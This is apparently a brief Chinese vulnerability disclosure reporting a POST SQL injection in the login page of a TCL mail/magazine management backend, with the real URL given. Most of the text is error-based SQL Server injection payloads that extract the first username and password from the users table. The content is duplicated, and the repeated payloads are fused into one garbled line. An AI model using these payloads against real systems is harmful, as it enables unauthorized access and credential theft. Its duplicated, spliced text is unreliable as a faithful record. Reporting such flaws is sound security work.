TCL集团邮件系统后台存在post注入,危害有点小大噢。
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='1
1' and 1=convert(int,(select top 1 password from users)) and '1'='1
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='11' and 1=convert(int,(select top 1 password from users)) and '1'='1